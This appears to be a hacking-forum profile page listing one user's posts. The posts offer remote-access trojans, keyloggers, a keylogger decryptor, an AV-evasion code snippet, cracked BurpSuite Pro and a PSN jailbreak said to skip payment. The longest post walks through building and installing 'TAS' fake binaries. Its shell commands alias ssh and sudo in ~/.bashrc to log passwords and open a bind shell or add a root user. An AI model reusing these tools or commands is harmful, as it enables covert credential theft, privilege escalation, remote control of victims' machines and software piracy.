0x1

LvL-23
  • Content Count

    859
  • Avg. Content Per Day

    0
  • Joined

  • Last visited

  • Days Won

    6

0x1 last won the day on December 3 2015

0x1 had the most liked content!

Community Reputation

5,849 Excellent

About 0x1

  • Rank
    LeVeL23 HacKerS TeaM
  • Birthday 03/03/1900

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. 0x1

    WORLD CONVID-19 UPDATE STAY SAFE GUYS

    Be afraid of only god no coronavirus may Allah protect you all
  2. 0x1

    Revenge Rat v0.3 [0x1]

    Revenge Rat v0.3 by NAPOLEON Mod by 0x1 Revenge Builder : C# Code by NYAM CAT DotNetToJScript by Tyranid Download [HIDE][Hidden Content]]
  3. 0x1

    Any good psn cracking tools?

    PS4 Pro Jailbreak 7.02 CFW Advantage: Back up the game using internal or external Hard Drive Disk (HDD). Play the online game through PSN. Can mod game inside the game option while gameplay... Disadvantage: After downloaded games through PlayStation Store, you are not eligible to transfer those games to another PS4 non-jailbreak console which is protected on mod chips inside console hardware that require the jailbreak in order to read content format. After the game downloaded, those games will not be stored in your PSN account because jailbreak will bypass the credit card when adding the game to the cart without paying an expensive game. Ref : [Hidden Content] PS4 PKG Tool: The tool allows us to manage and perform various operations on PS4 PKG. [HIDE][Hidden Content]] PS3DumpChecker: A PS3 NOR/NAND Dump Checker/Verifier [HIDE][Hidden Content]] PS4_Tools: Collection Of Open Source PS4 Tools all in one Library All Written in C# [HIDE][Hidden Content]] PSN API: This is a python wrapper for the PSN API. [HIDE][Hidden Content]] PS4vibe: PS4 Controller Rumbler Tester Homebrew : [HIDE][Hidden Content]] Orbital: Experimental PlayStation 4 emulator[HIDE]code: [Hidden Content] && dumper : [Hidden Content]] No have tested these tools
  4. Cutter: Presenting r2ghidra Decompiler | r2con 2019
  5. BurpSuite Professional 2020.1 This release updates the HTTP message editor with various new capabilities: Syntax colorising for JavaScript, JSON, and CSS. Syntax colorising is now dynamically updated as you type. Line numbers. Code folding. Performance improvements. We will soon continue improving the editor, with better prettifying of some formats and other helpful features. Various improvements have been made to the efficiency and stability of Burp Scanner. We are working towards enabling the new experimental browser-driven scanning by default, which will pave the way for significant enhancements to the scanner's capabilities over the coming year. A number of bug fixes and other enhancements have been made, including: Issues negotiating TLS through some LAN firewalls have been resolved. Feedback messages during crawls have been improved. File dialogs now remember the last selected folder on a per-function basis. Improvements have been made to some UI elements in the dark theme. The expiration of auto-generated TLS certificates has been shortened to comply with modern browser requirements. You can now save performance feedback data to a local file, to be submitted via email rather than automatically. Some causes of project file corruption have been resolved. Download Pro Version Only Jar files (Section UnCracked Files) burpsuite_pro_v2020.1.jar MD5: 6d7f5436ecf379c26540d401e13117ac SHA256: 5a75f4ff3b49f563d450963ca2ae71825aafe58e4a7fbf892a299bd8429d5cbc [Hidden Content]
  6. 0x1

    NetWire v2.0 R7

    @karmina you are in Section UnCracked Files No have Code is for try to Crack (have Anti-Debug ....)
  7. 0x1

    Napoleon Monitor v1.3

    Napoleon Monitor v1.3 Other Copy of Nj Rat About Napoleon monitor Napoleon Monitor is an advanced System Remote Administration Tool designed for Windows based operating systems, focused on providing a fast, secure and stable replacement for competing products at a significantly lower price. Napoleon Monitor can be used to: Fully administer Windows servers remotely. Provide remote support to clients, friends or colleagues. Connect to your home computer while you are away. Monitor employee’s work machines Connect to your work computer while you are away. Easy Crypter For Client Download [HIDE][Hidden Content]] When you want close the monitor you need to kill in task manager !!!!
  8. 0x1

    NetWire v2.0 R7

    NetWire v2.0 R7 NetWire version 2 brings 64 bit support for Windows, Linux and Mac Hosts along with new functionality. Bear in mind that we completely updated development environment and initial release might contain some undiscovered issues/bugs. Workstation Updated Workstation UI controls (Connection list, Log list, Port list, Password List) Reorganized options to select/check items in Connection list Added option to manage multiple selected ports and connection passwords at once Fixed issue with managing Workstation while reconnecting through Microsoft Remote Desktop Current Version (2.0 R7) IS compatible with previous version 2.0 R6! Host is fully compatible with previous version! If any Bug related to this release were found, please report to our Support Team by opening a ticket in the members area. Download [HIDE][Hidden Content]]
  9. 0x1

    x64dbg Plugin Manager

    x64dbg Plugin Manager v0.02 Console example x64plgmnrc.exe -G "C:\x64dbg_root" // Set root path for x64dbg x64plgmnrc.exe -U // Update list from server x64plgmnrc.exe -S // Show list of plugins x64plgmnrc.exe -i x64core // Install last version of x64dbg x64plgmnrc.exe -i AdvancedScript // install AdvancedScript How to build on Windows [Hidden Content] Download [HIDE][Hidden Content]]
  10. APK Easy Tool 1.56 / 1.57 beta-1 Apk Easy Tool is a lightweight application that enables you to manage, sign, compile and decompile the APK files for the apps you are working on. Allows you to manage the updates and fixes from one place The program comes with a clean and user-friendly interface that is unlikely to give you troubles. You can get started by selecting the desired file via the browsing function of the tool or drag and drop. The interface displays various information about the APK files, including package name, version, minimum SDK version and version code. From the main window, you can make the desired modifications as the main functions and additional options are all available in this tab. Speaking of functionality, some of the main operations you can perform via this tool, you can count compiling, decompiling, signing, extracting and installing the APK. In case you are working with ROMs only, then you can make further changes from the Framework tab. Moreover, if you feel you missed something, you can check all operations performed from the Log output tab. A straightforward app for managing APK files efficiently A noteworthy feature of the tool is that you can create the new code separately and overwrite the current APK with a simple drag and drop. It goes without saying that this operation can save you a lot of time and effort. In the eventuality that you provide frequent fixes and updates for your Android games or tools and want to be able to manage this processes smoother, then perhaps Apk Easy Tool could come in handy. - Softpedia Same as apktool, APK Easy Tool is neither intended for piracy and other non-legal uses. It could be used for localizing, adding some features or support for custom platforms, analyzing applications and much more. APK Easy Tool is absolute free for commercial and non-commercial use. Requirements: Windows 7 or above .NET Framework 4.6.2 or above Java SE/JDK for decompile, compile, and sign APK. If you don't have Java installed, you can only use Zipalign or Install APK Features: Decompile/Compile Decomile and compile APK, DEX and JAR files, with SPACE, symbols and germany, danish, swedish etc... characters support. Can cancel during operation Sign/Zipalign Signing and ZipAligning of APK/JAR files. Can cancel during operation Extract/Zip APK Extract and zip APK with 7z Compression-level 0-9. Can cancel during operation APK Infomation Show APK infomation with icon using aapt dump badging and link to Play Store Framework Install your framework and manage framework paths Log output View your logs to find errors. Set date to view your previous logs Sided log output is only available for higher resolution with 1250 width and above. Options Change options of tool, decompile, compile, sign and zipalign. Options: Java heap, Apktool version, apksigner version, directories, java path, Windows explorer integration, remeber window position and more All options and textboxes are saved as config.xml and will load on launch Quick options on main. Drag and drop Drop APK, DEX, JAR files and Decompiled folder on buttons to perform actions. Drop outside buttons to select/open as file/folder Apktool.jar version selection Can switch to other versions of apktool.kar on options Add other apktool.jar in "Apktool" folder Shortcuts 4 buttons to open work directories of decompiled APK, compiled APK, extracted APK and zipped APK Jumplist shortcuts Windows explorer integration Do actions by just right-clicking on APK file and choose the following options, decomile or compile APK, DEX, and JAR files, Zipalign APK, Check align, Sign APK and Install APK Getting started: Download .msi or zip file, If you download .msi, open it and simply install it. If you download portable version .zip, extract to the portable drive you like to. Launch APK Easy Tool, directory are automatically set Select the APK file you want to work with or drop the APK to perform an action Do some work and good luck You do not need to select APK and set the directory if you do drag and drop actions. Framework are for ROM developers and System App modder only It works the same way as the command line version Download links: Both stable and beta versions && Setup and Portable are included [Hidden Content]
  11. 0x1

    KEYLOGGER - SSEUR [Updated] v1.3.1.6

    Modded Version by 0x1 Credit to @itsMe Remove Check Update (if have Update exit). Remove get Stub from Pastebin (add string in Code)... [HIDE][Hidden Content]]
  12. Predator Pain v13 Decryptor by 0x1 Tools to help to decrypt string from Predator Pain v13 Keylogger From Infect file to Post: atomic-email-verifier Download Source [HIDE][Hidden Content]]
  13. 0x1

    Atomic Email Verifier 9.44.0.115 (32Bit)

    the Patch.exe is Infected with Predator Pain v13 Tools to Decrypt Option email, pass ...
  14. 0x1

    DarkArmour [Windows AV Evasion]

    Problem with the code try to contact the developer Maybe the error because the PE is different to image_base int main() : PIMAGE_DOS_HEADER image_base = (PIMAGE_DOS_HEADER)MapImageToMemory((LPVOID)decrypted_bytes); if (!image_base) { printf("%s\n", "[!] Unable to call PE, likely thats invalid"); }
  15. 0x1

    TAS

    A tiny framework for easily manipulate the tty and create fake binaries. How it works? The framework has three main functions, tas_execv, tas_forkpty, and tas_tty_loop. tas_execv: It is a function similar to execv, but it doesn't re-execute the current binary, something very useful for creating fake binaries. tas_forkpty: Is the same as forkpty, but it fills a custom structure, check forkpty man page for more details. tas_tty_loop: here is where the manipulation of the tty happen, you can set a hook function for the input and output, so it is possible to store the keys typed by the user or manipulate the terminal output. This is a superficial overview, check the codes in tas/fakebins/fun folders to understand how it really works. Fakebins Through manipulation of the PATH environment variable, or by using bash's aliases (or any other shell that supports aliases), you can run another program instead of the program that the user usually runs. This makes it possible to capture keystrokes and modify the command line to change the original program behavior. Change the command line of some programs, like sudo and su, can lead to privilege escalation. I'd created three programs as an example of what you can do with the framework: sudo, su and generic-keylogger. generic-keylogger The generic-keylogger, as the name suggests, is a binary that acts like a keylogger, the main idea is to use it to get passwords of programs like ssh, mysql, etc. sudo/su It can be used as a keylogger, or you can run some of the modules as root, by manipulating the command line. Step-by-step cmd change: The user types sudo cmd fakesudo cmd runs The fakesudo executes sudo fakesudo cmd After it is running as root, the fakesudo create a child process for executing some of the modules, and in the main PID, it runs the original command. Almost the same process happens with the su: The user types su - fakesu - runs The fakesu executes su - -c fakesu After it is running as root, the fakesu create a child process for executing some of the modules, and in the main PID, it runs bash -i Modules For now, there are only three modules: add-root-user - creates a root user with password in /etc/passwd. bind-shell - listen for incoming connections and spawn a tty shell. system - executes a command as root. I can add more modules in the future, but if you are familiar with the C language, I believe that it is not very difficult to change the programs to run what you want as root, just modify a few lines of code and change the super() function. Building First, build the base library: $ make CC .obj/globals.o CC .obj/getinode.o CC .obj/tas-execv.o CC .obj/tty.o CC .obj/xreadlink.o AR .obj/libtas.a After that, you can build generic-keylogger, sudo or su, by running make [target-bin] Example: $ make su make[1]: Entering directory '/home/test/tas/fakebins/su' [+] configuring fakesu ... enable keylogger? [y/N] y number of lines to record [empty = store all]: logfile (default: /tmp/.keys.txt): use some FUN modules? [y/N] n [+] configuration file created in /home/test/tas/fakebins/su/config.h CC su make[1]: Leaving directory '/home/test/tas/fakebins/su' Examples Creating a fakessh: Compile: $ make generic-keylogger make[1]: Entering directory '/home/test/tas/fakebins/generic-keylogger' [+] configuring generic-keylogger ... number of lines to record [empty = store all]: 3 logfile (default: /tmp/.keys.txt): [+] configuration file created in /home/test/tas/fakebins/generic-keylogger/config.h CC generic-keylogger make[1]: Leaving directory '/home/test/tas/fakebins/generic-keylogger' Install: $ mkdir ~/.bin $ cp generic-keylogger ~/.bin/ssh $ echo "alias ssh='$HOME/.bin/ssh'" >> ~/.bashrc In action: Using the bind-shell module Compile: make[1]: Entering directory '/home/test/tas/fakebins/sudo' [+] configuring fakesudo ... enable keylogger? [y/N] n use some FUN modules? [y/N] y [1] add-root-user [2] bind-shell [3] system [4] cancel > 2 listen port (Default: 1337): 5992 [+] configuration file created in /home/test/tas/fakebins/sudo/config.h CC sudo make[1]: Leaving directory '/home/test/tas/fakebins/sudo' Install: $ cp sudo ~/.sudo $ echo "alias sudo='$HOME/.sudo'" >> ~/.bashrc In action: leet-shell leet-shell is an example of how you can manipulate the tty output, it allows you to use the bash like a 1337 h4x0r. [[email protected] tas]$ make fun/leet-shell CC fun/leet-shell [[email protected] tas]$ fun/leet-shell SP4WN1NG L33T SH3LL H3R3 !!! [[email protected] t4s]$ 3ch0 'l33t sh3ll 1s l33t !!!' l33t sh3ll 1s l33t !!! Notes Somethings can make the fake-programs not work as expected: whitelisted sudo commands. /proc/ unvaliable (/proc/self/exe is used to obtain the binary fullname). The sudo will always ask for the password when the keylogger function is used in the fakesudo. How to protect yourself? This is a post-exploitation technique to performs privilege escalation and information gathering, if you want to protect yourself, not be invaded is a good way to start... Source Code & Download [HIDE][Hidden Content]]